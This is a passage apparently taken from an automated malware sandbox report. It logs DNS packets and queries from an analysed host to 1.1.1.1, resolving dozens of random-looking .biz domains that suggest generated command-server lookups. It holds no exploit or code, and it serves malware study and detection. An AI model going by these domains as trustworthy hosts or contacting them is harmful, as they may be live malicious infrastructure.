                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.481055975 CET5045753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.488157034 CET53504571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.205691099 CET6215453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.213124990 CET53621541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.897087097 CET6435753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.904475927 CET53643571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.993688107 CET5623553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.001612902 CET53562351.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.350317955 CET4946053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.352649927 CET5958753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.361455917 CET53494601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.363219023 CET53595871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.384247065 CET5958753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.384874105 CET5768753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.392910957 CET53595871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.394504070 CET53576871.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.233866930 CET6392753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.240638018 CET53639271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.251584053 CET6193053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.260457039 CET53619301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.944452047 CET5988653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:24.951802015 CET53598861.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.099728107 CET6439453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:25.106798887 CET53643941.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.497190952 CET5167853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.505906105 CET53516781.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.645207882 CET6028253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:26.653003931 CET53602821.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.612361908 CET5488153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:27.620047092 CET53548811.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.221752882 CET6329053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.228964090 CET53632901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.471430063 CET6236053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.479105949 CET53623601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.902534962 CET5637753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.911560059 CET53563771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.317163944 CET5642553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.324650049 CET53564251.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.608676910 CET5955853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.616755962 CET53595581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.813735008 CET6055253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.821866035 CET53605521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.087646008 CET6539653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.095278978 CET53653961.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.778492928 CET5010153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.786019087 CET53501011.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.313081026 CET5247553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.322005033 CET53524751.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.478019953 CET5233853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.020674944 CET53554921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.915997982 CET5546453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.927092075 CET53554641.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.606079102 CET5722953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.614737034 CET53572291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.472233057 CET6150453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.480401039 CET53615041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.176280022 CET6194553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.199852943 CET6194553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.275578976 CET53619451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.276009083 CET53619451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.121767998 CET5543953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.129270077 CET53554391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.973263025 CET5823253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.981697083 CET53582321.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.832979918 CET5297653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.842189074 CET53529761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.309295893 CET6276053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.316534042 CET53627601.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.170142889 CET5243053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.177561998 CET53524301.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.859144926 CET4972653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.866249084 CET53497261.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207818031 CET6329053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.214648962 CET53632901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.215356112 CET6332753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.222657919 CET53633271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.939558029 CET6341553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.947098017 CET53634151.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.692629099 CET5479253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.701354027 CET53547921.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.702120066 CET6367453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712205887 CET53636741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712905884 CET5435753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.719713926 CET53543571.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.934891939 CET5892453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.941885948 CET53589241.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.435702085 CET5564253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.442914963 CET53556421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.921685934 CET6338053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.949841022 CET6338053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021334887 CET53633801.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021348953 CET53633801.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.723961115 CET5546353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.731262922 CET53554631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.212035894 CET5130353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.219975948 CET53513031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710921049 CET6537753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.718348026 CET53653771.1.1.1192.168.2.10
Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.352389097 CET192.168.2.101.1.1.10xc591Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.897211075 CET192.168.2.101.1.1.10xdc1aStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.906517029 CET192.168.2.101.1.1.10xa963Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.922405005 CET192.168.2.101.1.1.10xbeb7Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.386504889 CET192.168.2.101.1.1.10x89eaStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:41.443006992 CET192.168.2.101.1.1.10x1e42Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.414771080 CET192.168.2.101.1.1.10x9c94Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.460711956 CET192.168.2.101.1.1.10x92d3Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:43.472605944 CET192.168.2.101.1.1.10xf6c9Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.891488075 CET192.168.2.101.1.1.10xe9aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:01.633254051 CET192.168.2.101.1.1.10x545aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:11.778592110 CET192.168.2.101.1.1.10x36bdStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:12.791233063 CET192.168.2.101.1.1.10x36bdStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:14.919965982 CET192.168.2.101.1.1.10x7e9eStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.204062939 CET192.168.2.101.1.1.10xd42fStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.788466930 CET192.168.2.101.1.1.10x69Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.522500038 CET192.168.2.101.1.1.10x7ca0Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.800151110 CET192.168.2.101.1.1.10xe847Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.547219992 CET192.168.2.101.1.1.10x2648Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.600056887 CET192.168.2.101.1.1.10x31a1Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.231096029 CET192.168.2.101.1.1.10xafe7Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.543577909 CET192.168.2.101.1.1.10x107aStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.617479086 CET192.168.2.101.1.1.10x62bStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626003981 CET192.168.2.101.1.1.10xb664Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.113817930 CET192.168.2.101.1.1.10xa8baStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.122668982 CET192.168.2.101.1.1.10xf7aaStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.129780054 CET192.168.2.101.1.1.10xa93fStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.375494957 CET192.168.2.101.1.1.10x43b7Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.486289978 CET192.168.2.101.1.1.10x81bStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.290910959 CET192.168.2.101.1.1.10x5677Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.806731939 CET192.168.2.101.1.1.10xdc07Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.521691084 CET192.168.2.101.1.1.10xcf08Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.325238943 CET192.168.2.101.1.1.10xe0c1Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.576394081 CET192.168.2.101.1.1.10x60ffStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.571335077 CET192.168.2.101.1.1.10xdfaaStandard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.408695936 CET192.168.2.101.1.1.10xb4c5Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.579896927 CET192.168.2.101.1.1.10x35baStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.562392950 CET192.168.2.101.1.1.10x4749Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.580204964 CET192.168.2.101.1.1.10xad95Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.704005957 CET192.168.2.101.1.1.10x9c91Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:36.812973976 CET192.168.2.101.1.1.10xe20cStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.639296055 CET192.168.2.101.1.1.10x1f8bStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.151489019 CET192.168.2.101.1.1.10xa3b7Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.615215063 CET192.168.2.101.1.1.10x9aa7Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.637921095 CET192.168.2.101.1.1.10x1368Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.895858049 CET192.168.2.101.1.1.10x9abfStandard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:42.904335022 CET192.168.2.101.1.1.10x9db4Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.923489094 CET192.168.2.101.1.1.10x57deStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.682910919 CET192.168.2.101.1.1.10xf6a6Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.467381954 CET192.168.2.101.1.1.10xb50Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.112123966 CET192.168.2.101.1.1.10x204fStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.600795984 CET192.168.2.101.1.1.10xaf3bStandard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:34.967974901 CET192.168.2.101.1.1.10x5599Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.002373934 CET192.168.2.101.1.1.10xb250Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.090488911 CET192.168.2.101.1.1.10x43ddStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:36.960238934 CET192.168.2.101.1.1.10x4adcStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:37.057459116 CET192.168.2.101.1.1.10x77bStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.182837009 CET192.168.2.101.1.1.10xb4f3Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.477814913 CET192.168.2.101.1.1.10xdc65Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.119267941 CET192.168.2.101.1.1.10x5934Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.170864105 CET192.168.2.101.1.1.10x785aStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:39.179410934 CET192.168.2.101.1.1.10x84beStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.077641010 CET192.168.2.101.1.1.10xed74Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.087145090 CET192.168.2.101.1.1.10x897Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.637636900 CET192.168.2.101.1.1.10x8b1Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.626871109 CET192.168.2.101.1.1.10xb1caStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.849276066 CET192.168.2.101.1.1.10xe9efStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.788063049 CET192.168.2.101.1.1.10xaacaStandard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.111144066 CET192.168.2.101.1.1.10xedcaStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.571695089 CET192.168.2.101.1.1.10xa8daStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.359303951 CET192.168.2.101.1.1.10x5389Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.403120995 CET192.168.2.101.1.1.10xfeeaStandard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.217324972 CET192.168.2.101.1.1.10xb5d7Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.275027037 CET192.168.2.101.1.1.10xc50fStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.962408066 CET192.168.2.101.1.1.10x9872Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.701958895 CET192.168.2.101.1.1.10xeaecStandard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:47.827322960 CET192.168.2.101.1.1.10xd354Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.581064939 CET192.168.2.101.1.1.10xe3d6Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.807296038 CET192.168.2.101.1.1.10x2a6eStandard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.300575018 CET192.168.2.101.1.1.10xe7d8Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.447861910 CET192.168.2.101.1.1.10x262cStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.448919058 CET192.168.2.101.1.1.10xe81dStandard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.333614111 CET192.168.2.101.1.1.10x709fStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.471158028 CET192.168.2.101.1.1.10x937aStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.433979988 CET192.168.2.101.1.1.10x43b5Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:52.967678070 CET192.168.2.101.1.1.10x5107Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.308912992 CET192.168.2.101.1.1.10x1a3fStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
